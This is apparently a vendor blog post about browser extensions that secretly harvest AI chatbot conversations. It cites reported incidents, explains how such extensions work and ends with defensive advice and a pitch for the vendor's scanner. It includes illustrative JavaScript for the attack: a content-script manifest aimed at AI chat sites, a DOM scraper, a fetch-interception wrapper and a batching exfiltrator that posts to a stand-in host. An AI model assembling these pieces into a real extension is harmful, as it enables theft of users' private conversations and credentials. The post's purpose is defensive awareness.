Every day, millions of people share sensitive information with AI chatbots. Business strategies, proprietary source code, personal medical questions, legal details, financial records. The conversations feel private, tucked behind a login screen on a platform you trust. But most users never consider that their own browser extensions can silently read every word they type and every response they receive.

This is not a theoretical concern. Over the past several months, security researchers have uncovered multiple real-world campaigns where browser extensions were actively harvesting AI conversations at scale, affecting millions of users. The pattern is consistent, the techniques are well understood, and the problem is accelerating.

Real Incidents: Extensions Caught Harvesting AI Chats

In December 2025, researchers at Koi Security discovered that a widely installed VPN extension, one with over 8 million users and a Google "Featured" badge in the Chrome Web Store, was silently capturing conversations from ChatGPT, Claude, Gemini, and at least five other AI platforms. The extension forwarded complete conversation transcripts to external servers, where the data was sold to data brokers. Malwarebytes independently confirmed the findings. The extension had been available for years and had passed multiple Chrome Web Store reviews without detection.

In January 2026, SOCRadar and Dataprise published reports on two separate extensions that impersonated legitimate AI assistant tools. Together, these extensions had been installed by over 900,000 users. They collected complete ChatGPT and DeepSeek conversation histories, browsing data, and authentication tokens. The stolen tokens gave attackers persistent access to victims' AI accounts even after the extensions were removed.

In March 2026, Microsoft's own security team published research documenting a class of extensions specifically designed to passively collect AI-assisted chat content. Their analysis highlighted that these extensions used sophisticated evasion techniques, remaining dormant during normal browsing and only activating their data collection routines when they detected an AI platform URL in the browser.

These are not isolated cases. They represent a growing category of attacks that specifically target AI conversations because of the uniquely valuable data they contain.

How Extension-Based Interception Actually Works

To understand why this threat is so difficult to detect, you need to understand how browser extensions interact with web pages at a technical level. The mechanism centers on a feature called content scripts. For a deeper technical breakdown of content scripts and the Chrome extension permission model, see our post on Chrome Extension Security.

Content Scripts and DOM Access

When a browser extension declares the content_scripts field in its manifest, or uses the scripting.executeScript API, it can inject JavaScript directly into any web page that matches a specified URL pattern. That injected script runs in the context of the page itself. It can read the entire DOM, which includes every message displayed in a chat interface, every character you type into an input field, and every response the AI generates.
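In manifest terms, the declaration takes only a few lines. The excerpt below is a minimal, hypothetical Manifest V3 fragment (the extension name, the harvest.js file name, and the exact match patterns are illustrative, not taken from any real campaign):

```json
{
  "manifest_version": 3,
  "name": "Innocent-Looking Helper",
  "version": "1.0",
  "content_scripts": [
    {
      "matches": [
        "https://chat.openai.com/*",
        "https://claude.ai/*",
        "https://gemini.google.com/*"
      ],
      "js": ["harvest.js"],
      "run_at": "document_idle"
    }
  ]
}
```

Nothing in this manifest looks different from what a legitimate grammar checker or coupon finder would declare; the difference lies entirely in what harvest.js does once it runs.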

A content script targeting ChatGPT, for example, could use a simple DOM query like document.querySelectorAll('[data-message-author-role]') to extract every message in the conversation thread. Similar selectors work for Claude, Gemini, and other platforms. The script can also attach MutationObserver listeners to detect new messages the instant they appear, capturing the conversation in real time.
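As a concrete and deliberately simplified sketch, the harvesting logic can fit in a few lines of JavaScript. The extractMessages helper and the observer wiring below are illustrative assumptions, not code recovered from any real extension:

```javascript
// Illustrative sketch of a harvesting content script. The pure helper is
// separated from the DOM wiring so the logic is easy to follow.
const MESSAGE_SELECTOR = '[data-message-author-role]';

// Turn node-like objects into {role, text} records.
function extractMessages(nodes) {
  return nodes.map((node) => ({
    role: node.getAttribute('data-message-author-role'),
    text: node.textContent.trim(),
  }));
}

// In a real content script, this block runs against the live page:
if (typeof document !== 'undefined') {
  // Grab everything already on screen.
  let transcript = extractMessages(
    [...document.querySelectorAll(MESSAGE_SELECTOR)]
  );

  // Re-harvest the instant new messages stream in.
  new MutationObserver(() => {
    transcript = extractMessages(
      [...document.querySelectorAll(MESSAGE_SELECTOR)]
    );
  }).observe(document.body, { childList: true, subtree: true });
}
```

The point of the sketch is how little code is required: one selector, one mapping function, one observer, and the entire conversation is in a JavaScript array ready to be sent anywhere.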

Intercepting Network Requests

Content scripts are not limited to reading the visible page. They can also intercept the underlying network traffic. Because content scripts normally run in an isolated world, the malicious code first injects a small script into the page's main world; that script overrides the native XMLHttpRequest and fetch APIs before the chat application uses them, capturing every API call between the browser and the AI platform's servers. This includes the raw request payloads (your prompts) and the raw response bodies (the AI's answers), often as structured JSON that is trivial to parse and store.
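The interception itself can be sketched as a wrapper around any fetch-like function. The makeInterceptingFetch name and the sink array are invented for this example; a real attack would install the wrapper over window.fetch in the page's main world before the chat app loads:

```javascript
// Wrap a fetch-like function so every request URL and response body is
// copied into `sink` before the page sees the response.
function makeInterceptingFetch(realFetch, sink) {
  return async function interceptedFetch(...args) {
    const response = await realFetch.apply(this, args);
    // Clone the response: the copy is read here, the original goes back
    // to the page untouched, so nothing looks broken to the user.
    response
      .clone()
      .text()
      .then((body) => sink.push({ url: String(args[0]), body }))
      .catch(() => {}); // never surface errors to the page
    return response;
  };
}

// Installation in a real attack (main-world script, before the app runs):
// window.fetch = makeInterceptingFetch(window.fetch, exfilQueue);
```

Note that the page receives exactly the response it asked for; from the user's perspective, and from the AI platform's perspective, nothing is wrong.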

Selective Activation to Avoid Detection

The most sophisticated malicious extensions do not behave suspiciously during normal browsing. They ship with legitimate functionality (a working VPN, a real grammar checker, a genuine productivity tool) and only activate their harvesting code when they detect that the user is visiting an AI platform. The extension checks the current URL against a list of known AI chat domains. If there is no match, the extension does nothing unusual. If the URL matches chat.openai.com, claude.ai, gemini.google.com, or similar domains, the harvesting payload activates.
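The gating check itself is trivial to write. A hedged sketch follows; the domain list here is just the examples named above, while real campaigns carry much longer lists:

```javascript
// Domains that trigger the harvesting payload (illustrative list only).
const AI_CHAT_HOSTS = ['chat.openai.com', 'claude.ai', 'gemini.google.com'];

// True when the given URL points at an AI chat platform (including
// subdomains); false for everything else, including unparseable input.
function isAiChatUrl(url) {
  try {
    const host = new URL(url).hostname;
    return AI_CHAT_HOSTS.some((d) => host === d || host.endsWith('.' + d));
  } catch {
    return false; // not a valid URL; stay dormant
  }
}

// Dormant on every other site; only "wakes up" on a match:
// if (isAiChatUrl(location.href)) activateHarvester();
```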

This conditional behavior makes the extensions nearly impossible to detect through casual observation or even basic automated scanning. The extension appears clean during testing because it only reveals its true purpose on specific sites.

Data Exfiltration

Once the data is captured, the extension sends it to a remote server controlled by the attacker. This is typically done through standard HTTPS POST requests to domains that appear innocuous, sometimes disguised as analytics or telemetry endpoints. The data is often batched and sent at intervals to avoid triggering network monitoring tools. Some extensions encode the stolen data as URL parameters or embed it in image requests to bypass content security policies.
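The batching pattern looks roughly like the sketch below. The makeExfiltrator factory and its send parameter are invented names for illustration; a real extension would pass fetch and a disguised "telemetry" endpoint:

```javascript
// Queue captured records and flush them in batches, so network monitors see
// an occasional "telemetry" POST instead of a steady suspicious stream.
function makeExfiltrator(endpoint, send) {
  const queue = [];
  return {
    record(entry) {
      queue.push(entry);
    },
    flush() {
      if (queue.length === 0) return;
      const batch = queue.splice(0); // drain the queue in one step
      send(endpoint, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(batch),
      });
    },
  };
}

// In a real extension, wired to a timer so transfers stay sparse:
// const exfil = makeExfiltrator('https://fake-analytics.example/t', fetch);
// setInterval(() => exfil.flush(), 60_000); // one batch per minute
```

Each flush is indistinguishable at the network layer from a legitimate analytics ping, which is exactly why the endpoint is disguised that way.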

Why AI Conversations Are High-Value Targets

Browser extensions have always been able to read web page content. So why are AI chat platforms drawing special attention from attackers now? The answer is straightforward: the density of sensitive information in AI conversations is extraordinarily high compared to typical web browsing.

Proprietary Code and Intellectual Property

Developers routinely paste entire functions, classes, and configuration files into AI assistants for debugging help, code review, or refactoring suggestions. A single conversation might contain proprietary algorithms, database schemas, API architectures, or deployment configurations that represent months of engineering work.

Business Strategy and Internal Communications

Executives and managers use AI tools to draft internal memos, analyze competitive landscapes, brainstorm product strategies, and prepare financial projections. These conversations often contain information that would be classified as confidential or trade-secret material in a corporate context.

Personal Health, Legal, and Financial Details

Individuals use AI chatbots to ask about medical symptoms, legal situations, tax strategies, and personal financial decisions. These conversations frequently contain details that people would never share on a public forum or even in an unencrypted email.

Credentials and API Keys

It is surprisingly common for users to paste API keys, database connection strings, environment variables, and even passwords into AI chat prompts while troubleshooting. A single leaked API key can provide an attacker with direct access to cloud infrastructure, payment processing systems, or customer databases.

Structured and Searchable Data

Unlike the fragments of data an extension might capture from general web browsing, AI conversations are neatly structured as question-and-answer pairs. They are inherently organized, keyword-rich, and easy to index. This makes them ideal for resale to data brokers, for targeted phishing campaigns, or for competitive intelligence operations.

The Permission Problem

A fundamental challenge is that the permissions required for malicious AI chat harvesting are the same permissions required for many legitimate extension features. An extension that needs to read page content to check your grammar, insert coupons, or modify page styling will request the same activeTab or broad host permissions that a malicious extension would use to read your AI conversations.

Chrome's permission system does not distinguish between "read this page to help the user" and "read this page to exfiltrate data." From the browser's perspective, both actions are identical. This is why permission auditing alone is not sufficient protection. You need to understand not just what an extension can do, but what it is doing. For a broader look at how extension permissions create security blind spots, see The Permission Problem: Why Browser Extensions Are a Blind Spot.

What You Can Do About It

The good news is that practical defenses exist. The key is layering multiple protections rather than relying on any single measure.

1. Audit and Minimize Your Extensions

Open your browser's extension manager right now and look at every extension you have installed. For each one, ask: do I actively use this? Do I know what company made it? When was it last updated? Remove anything you do not recognize or no longer need. Every extension you keep installed is an additional piece of code that has access to your browsing activity.

2. Scrutinize Permissions Before Installing

Before adding any new extension, read its permission requests carefully. Be especially cautious of extensions that request "Read and change all your data on all websites." That permission grants full content script access to every page you visit, including AI chat platforms. Some extensions need this permission legitimately, but many request it when narrower permissions would suffice.

3. Use a Dedicated Browser Profile

Create a separate browser profile specifically for sensitive AI work. Install zero extensions in that profile, or only install extensions you have thoroughly vetted. This creates an isolated environment where your AI conversations cannot be accessed by the extensions in your primary browsing profile.

4. Watch for Warning Signs

Be suspicious of extensions that suddenly change ownership, receive unexpected updates after long periods of inactivity, or request new permissions they did not previously need. Attackers frequently purchase established extensions with large user bases and then push malicious updates to the existing install base.

5. Use AI Chat Shield for Continuous Monitoring

We built AI Chat Shield specifically to close this gap. It scans every extension in your browser, analyzes their permissions and behaviors, and scores them on a 0 to 100 risk scale. It flags extensions that have the technical capability to access AI chat platforms, even if those extensions appear legitimate on the surface. The free tier gives you instant visibility into your risk exposure. Pro adds real-time monitoring that continuously watches for suspicious extension behavior and can auto-disable risky extensions before they capture your data.


The Bottom Line

AI tools are transforming how we work, think, and solve problems. But every conversation you have with an AI assistant is a potential data source for any extension running in your browser. The incidents from late 2025 and early 2026 prove that this is not a hypothetical risk. Millions of users have already had their AI conversations harvested without their knowledge.

Protecting your AI conversations requires the same seriousness you would apply to protecting passwords or financial accounts. Audit your extensions, minimize your attack surface, and use tools designed to detect the threats that browsers themselves cannot see. Your AI conversations deserve the same security you expect from the rest of your digital life.